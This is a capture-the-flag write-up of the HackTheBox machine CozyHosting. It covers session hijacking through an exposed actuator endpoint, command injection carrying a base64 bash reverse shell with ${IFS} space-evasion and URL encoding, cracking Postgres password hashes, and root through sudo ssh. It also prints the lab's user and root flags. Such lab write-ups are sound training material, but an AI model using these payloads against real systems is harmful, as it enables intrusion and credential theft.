Skip to content

Latest commit

 

History

History
265 lines (139 loc) · 8.26 KB

README.md

File metadata and controls

265 lines (139 loc) · 8.26 KB
Raw

CozyHosting

Write-up author: jon-brandy

Lesson learned:

  • Accessing postgres

image

STEPS:

PORT SCANNING

┌──(brandy㉿bread-yolk)-[~]
└─$ nmap -p- -sVC 10.10.11.230 --min-rate 1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 22:59 PDT
Nmap scan report for 10.10.11.230
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
  1. Based from the nmap results, the machine runs a webapp and opens ssh logins.

WEBAPP

image

  1. The wappalyzer itself shows us minimum info (for version).

image

  1. Hence i ran dirsearch to list all directories or files available for this webapp.

RESULTS

image

  1. admin page and actuator directory should be our interest here.
  2. Opens actuator/sessions shall resulting to this:

image

image

  1. Noticed there's a user session with name kanderson (Informatin Disclosure).
  2. Let's change our session to kanderson's, then refresh the page.

image

RESULT

image

  1. Scrolling down you shall see an input box.

image

  1. This should be our interest. To identify what's the vuln, let's capture the request we send using burpsuite.
  2. Let's just fill the hostname with our tun0 interface and leave username empty, we just want to know what response might the server give.

IN BURPSUITE

image

  1. Noticed the server responds an error for the ssh command.
  2. This make it clear, that the vuln should be related to command injection.
  3. The idea is using basic bash reverse shell payload:

BASH REVERSE SHELL PAYLOAD

bash -i >& /dev/tcp/10.10.16.14/1337 0>&1

ENCODE IT TO BASE64 (adding -w 0, to make sure the output is a single line command)

echo "bash -i >& /dev/tcp/10.10.16.14/1337 0>&1" | base64 -w 0

RESULT

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK
  1. Great! Now for the final payload, because we want the server to decode our payload first then execute it, hence we use base64 -d.
  2. But again, we need to encode it again with url-encode to terminate all the spaces.
  3. The best practice is to use --> ${IFS%??} to avoid spaces or other characters that may be treated as delimiters by the shell.
  4. Then we url-encode the payload, set listener and send our payload.

PAYLOAD

Original one:

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK" | base64 -d | bash;

Adding ${IFS%??} to covering whitespaces

;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

URL-ENCODE:

%3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA%2BJjEK%22%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D%2Dd%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B

RESULT

image

  1. At this point we can't get user flag, because we're not having the shell as "josh".

image

  1. Noticed there's a .jar file which might be our interest.
  2. Let's setup a python server at the remote server and download the file to our local machine.

NOTES: setup python server at port other than 80.

RESULT

image

  1. Well if you noticed, it failed to download it full.
  2. Hmm, confused here, but anyway since we opens python server at port 8000, accessing the remote host with port 8000 shall shown this:

image

  1. Let's download it manually.

image

DECOMPILING IT WITH JD-GUI

image

  1. Interesting, we found a postgres cred.
  2. Let's access psql at the remote server.

image

  1. Run --> \l to list all the databases available.

image

  1. Great! Let's connect to cozyhosting --> run \c cozyhosting.
  2. To dump all the tables run -> \d.

image

DUMPING users column.

image

  1. Interesting, users table should be our interest. Let's select all from it.

SELECT * FROM public.users;

image

30 Awesome! Let's crack all the hashed password with john. 31. I started to cracking the first hash with john and while waiting for john to cracks hash, I identify the hash using hashid, which allows to use hashcat.

image

  1. Because time is money 🙏🏼.

GRABBING THE HASHCAT CODE FOR BCRYPT.

image

  1. Found nothing for the kanderson's hash.
  2. But succeed cracks the password for admin's hash.

image

  1. Hmm.. Remembering our remote /home dir is josh, we make an interpretes of potential password reuse.
  2. Turns out it is.

RESULT

image

GETTING USER FLAG

image

USER FLAG

83cfd0650592f468972d63e44761211a
  1. Checking sudo permissions for josh resulting to this:

image

  1. ssh command is being run as root.
  2. Diving on the internet and searching for ssh gtfobins exploit, shall resulting to this --> https://gtfobins.github.io/gtfobins/ssh/

image

  1. Using it.

image

  1. Successfully gained root!

GETTING ROOT FLAG

image

ROOT FLAG

5783572fa5559507b67cfbd6636c934e